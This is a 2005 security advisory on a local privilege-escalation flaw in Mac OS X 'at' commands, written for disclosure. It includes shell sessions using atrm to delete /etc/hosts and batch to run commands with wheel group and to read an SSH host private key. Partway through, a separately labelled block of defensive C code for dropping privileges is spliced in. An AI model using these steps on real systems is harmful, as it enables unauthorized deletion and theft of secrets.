DMA-2005-0127a.txt

Published: 28 Jan 2005
Reported by: Kevin Finisterre
Source: packetstormsecurity.com

Apple OSX command vulnerability allows privilege escalation, affecting multiple command functions.

DMA[2005-0127a] - 'Apple OSX batch family poor use of setuid'  
Author: Kevin Finisterre  
Vendor: http://www.apple.com/macosx/  
Product: * at commands <= Mac OS X v10.3.7, Mac OS X Server v10.3.7  
  
References: (CAN-2005-0125)  
http://www.digitalmunition.com/DMA[2005-0127a].txt  
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0125  
http://lists.apple.com/archives/security-announce/2005/Jan/msg00001.html  
http://www.apple.com/support/downloads/securityupdate2005001macosx1028client.html  
http://docs.info.apple.com/article.html?artnum=300770  
http://www.immunitysec.com/downloads/nukido.pdf  
http://www.immunitysec.com/downloads/nukido.sxw  
  
Description:   
Mac OS X v10.3 Panther offers breakthroughs in innovation and ease of use that won't   
be seen in other operating systems for years, if ever, while its UNIX-based core   
provides rock-solid security on the Internet.  
  
On 1/25/2005 Apple published an advisory for the "at" commands to address a local   
privilege escalation vulnerability. The "at" family of commands did not properly drop   
privileges. This could allow a local user to remove files not owned by them, run programs   
with added privileges, or read the contents of normally unreadable files. The update   
patched the commands at, atrm, batch, atq, and atrun.   
  
The following session outlines the behavior that was reported.   
  
Please note that at, batch, atq, and atrm are all disabled by default on Mac OS X. Each   
of these commands depends on the execution of atrun, which has been disabled due to power   
management concerns. Those who would like to use these commands must first re-enable   
/usr/libexec/atrun by removing the leading '#' from the line  
#*/5 * * * * root /usr/libexec/atrun  
in the file /etc/crontab.   
  
'atrm' can be used to delete any file on the system. The atrm vulnerability does not   
depend upon atrun.   
  
CrunkJuice:~ kevinfinisterre$ id  
uid=501(kevinfinisterre) gid=501(kevinfinisterre) groups=501(kevinfinisterre),   
79(appserverusr), 80(admin), 81(appserveradm)  
  
CrunkJuice:~ kevinfinisterre$ rm /etc/hosts  
override rw-r--r-- root/wheel for /etc/hosts? y  
rm: /etc/hosts: Permission denied  
  
CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts  
-rw-r--r-- 1 root wheel 214 3 Dec 20:19 /etc/hosts  
  
CrunkJuice:~ kevinfinisterre$ atrm /etc/hosts  
  
CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts  
ls: /etc/hosts: No such file or directory  
  
'batch' can be used to execute commands as gid=0(wheel) groups=0(wheel), 1(daemon),   
2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)   
  
CrunkJuice:/tmp kevinfinisterre$ echo > aa  
/usr/bin/id > /tmp/test  
  
CrunkJuice:/tmp kevinfinisterre$ batch -f /tmp/aa 0  
Job b0118490c.000 will be executed using /bin/sh  
  
CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test  
cat: /tmp/test: No such file or directory  
  
(wait 5 minutes)  
  
CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test  
uid=501(kevinfinisterre) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys),  
4(tty), 5(operator), 20(staff), 31(guest), 80(admin)  
  
'batch' can also be used to read any file on the system.   
  
CrunkJuice:~ kevinfinisterre$ cat /etc/ssh_host_dsa_key  
cat: /etc/ssh_host_dsa_key: Permission denied  
  
CrunkJuice:~ kevinfinisterre$ ls -al /etc/ssh_host_dsa_key  
-rw------- 1 root wheel 668 16 Nov 19:39 /etc/ssh_host_dsa_key  
  
CrunkJuice:~ kevinfinisterre$ batch -f /etc/ssh_host_dsa_key  
Job b011848db.000 will be executed using /bin/sh  
  
CrunkJuice:~ kevinfinisterre$ ls -al /var/at/jobs/b011848db.000  
-rwx------ 1 kevinfin wheel 1263 3 Dec 20:31 /var/at/jobs/b011848db.000  
  
CrunkJuice:~ kevinfinisterre$ cat /var/at/jobs/b011848db.000  
#! /bin/sh  
# mail root 0  
umask 22  
TERM_PROGRAM=Apple\_Terminal; export TERM_PROGRAM  
SHELL=\/bin\/bash; export SHELL  
TERM_PROGRAM_VERSION=100; export TERM_PROGRAM_VERSION  
OLDPWD=\/var\/at\/jobs; export OLDPWD  
USER=kevinfinisterre; export USER  
__CF_USER_TEXT_ENCODING=0x1F5\:0\:0; export __CF_USER_TEXT_ENCODING  
PATH=\/bin\:\/sbin\:\/usr\/bin\:\/usr\/sbin; export PATH  
PWD=\/Users\/kevinfinisterre; export PWD  
SHLVL=1; export SHLVL  
HOME=\/Users\/kevinfinisterre; export HOME  
LOGNAME=kevinfinisterre; export LOGNAME  
SECURITYSESSIONID=20ee50; export SECURITYSESSIONID  
cd /Users/kevinfinisterre  
-----BEGIN DSA PRIVATE KEY-----  
ascsefmwe;lijweio;fj23n8r01ur9wefskljvnsdlvsd;kvcms;dkmcv;sdklvm  
dfbkldfmbdfp0bjerpgjwglvksdmvw430vgwevklmsdkvmasdvnqwefh3bnjnsek  
6513515641w6egf4e65v4s6v54we65f4ae6f464b6464b6w4bw6e4bvgw6evgf4w  
sdvsdfbgfgbndfdfvbsdfvsd5v46se8f4634f6w3f4q3f4sd35vf4sd3v4sd3v4s  
ascsefmwe;lijweio;fj23n8r01ur9wefskljvnsdlvsd;kvcms;dkmcv;sdklvm  
dfbkldfmbdfp0bjerpgjwglvksdmvw430vgwevklmsdkvmasdvnqwefh3bnjnsek  
6513515641w6egf4e65v4s6v54we65f4ae6f464b6464b6w4bw6e4bvgw6evgf4w  
sdvsdfbgfgbndfdfvbsdfvsd5v46se8f4634f6w3f4q3f4sd35vf4sd3v4sd3v4s  
ereethamstahenkryption  
-----END DSA PRIVATE KEY-----  
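The three sessions above show the same root cause from three angles: the job file is built from the "-f file" with elevated privileges (so an unreadable key lands in the spool), atrm unlinks without checking who owns the target, and atrun runs the job with gid=0 and root's supplementary groups. As an added example, not Apple's code and not part of the advisory, the following C sketch shows the privilege handling a setuid/setgid spool helper needs: open_as_real_user opens a user-supplied path with the caller's real ids so the kernel refuses what the caller may not read, remove_if_owned checks ownership before unlinking, and drop_privileges_permanently drops supplementary groups, group and user before a job runs and verifies the drop cannot be undone. All function names, the /tmp file name and the sample content are assumptions constructed for the example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Added example (not Apple's code); every name here is an assumption. */

/* Open the user-supplied "-f file" with the caller's REAL uid/gid, so a file
 * the caller cannot read is refused by the kernel instead of being copied
 * into the spool. Effective ids are restored afterwards so the helper can
 * still write the job file. Returns a descriptor or -1 with errno set. */
int open_as_real_user(const char *path) {
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    int fd, saved_errno;

    if (setegid(getgid()) != 0 || seteuid(getuid()) != 0)  /* temporary drop */
        return -1;
    fd = open(path, O_RDONLY | O_NOFOLLOW);                 /* no symlink detours */
    saved_errno = errno;
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0) { /* restore */
        if (fd >= 0) close(fd);
        return -1;
    }
    errno = saved_errno;
    return fd;
}

/* Ownership check for the atrm case: 1 if the real uid owns the spool entry
 * (and it is not a symlink), 0 if not, -1 on error with errno set. */
int caller_owns_file(const char *path) {
    struct stat st;
    if (lstat(path, &st) != 0) return -1;
    if (S_ISLNK(st.st_mode)) return 0;
    return st.st_uid == getuid();
}

/* Unlink only after the ownership check passes. Note the lstat/unlink window;
 * a production helper would open the spool directory and use fstatat/unlinkat. */
int remove_if_owned(const char *path) {
    int owned = caller_owns_file(path);
    if (owned != 1) {
        if (owned == 0) errno = EPERM;
        return -1;
    }
    return unlink(path);
}

/* Permanent drop before the job runs (the step the advisory shows skipped,
 * leaving gid=0 and root's supplementary groups). Supplementary groups and
 * group first, then user; afterwards verify that root cannot be regained. */
int drop_privileges_permanently(void) {
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (geteuid() == 0 && setgroups(1, &rgid) != 0) return -1; /* needs root */
    if (setgid(rgid) != 0) return -1;
    if (setuid(ruid) != 0) return -1;
    if (geteuid() != ruid || getegid() != rgid) return -1;
    if (ruid != 0 && setuid(0) == 0) return -1;  /* drop must be irreversible */
    return 0;
}

/* Self-check: write a constructed job-like file, read it back through
 * open_as_real_user, confirm ownership, then remove it. Returns 1 on success. */
int demo_roundtrip(void) {
    char path[] = "/tmp/at-demo-XXXXXX";             /* assumed scratch location */
    const char *content = "/usr/bin/id > /tmp/test\n"; /* constructed input */
    char buf[64];
    ssize_t n, len = (ssize_t)strlen(content);
    int fd, ok = 0;

    fd = mkstemp(path);
    if (fd < 0) return 0;
    if (write(fd, content, len) != len) { close(fd); unlink(path); return 0; }
    close(fd);

    fd = open_as_real_user(path);
    if (fd >= 0) {
        n = read(fd, buf, sizeof buf - 1);
        close(fd);
        if (n > 0) { buf[n] = '\0'; ok = strcmp(buf, content) == 0; }
    }
    ok = ok && caller_owns_file(path) == 1;
    ok = ok && remove_if_owned(path) == 0;
    ok = ok && caller_owns_file(path) == -1;   /* entry is gone */
    return ok;
}

int main(void) {
    printf("roundtrip ok: %d\n", demo_roundtrip());
    printf("permanent drop ok: %d\n", drop_privileges_permanently() == 0);
    return 0;
}
```

Run unprivileged, the temporary and permanent drops are no-ops and the self-check exercises only the file handling; the value of the pattern shows when the binary is installed setgid or setuid, where open_as_real_user makes the kernel's permission check on the -f file authoritative and drop_privileges_permanently is what keeps a scheduled job from inheriting the scheduler's groups.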
  
Apple has released patches for this vulnerability, please see the   
references above.   
  
For the protection of its customers, Apple does not disclose, discuss,  
or confirm security issues until a full investigation has occurred and  
any necessary patches or releases are available. Apple likes to focus   
response efforts so that they have the greatest impact across  
the product line; because of this, they generally will not respond to   
e-mail messages unless further information is needed for a security   
issue.  
  
This is the timeline associated with this bug.   
  
12/20/2004 02:22 PM - initial response  
01/03/2005 09:17 PM - followup  
01/12/2005 02:56 PM - ...  
01/13/2005 08:41 PM - ...  
01/19/2005 12:16 AM - confirm credit  
01/20/2005 12:13 PM - immunitysec nukido release  
  
-KF  
  
  


Vulners AI Score: 0.1 (low risk)
EPSS: 0.00269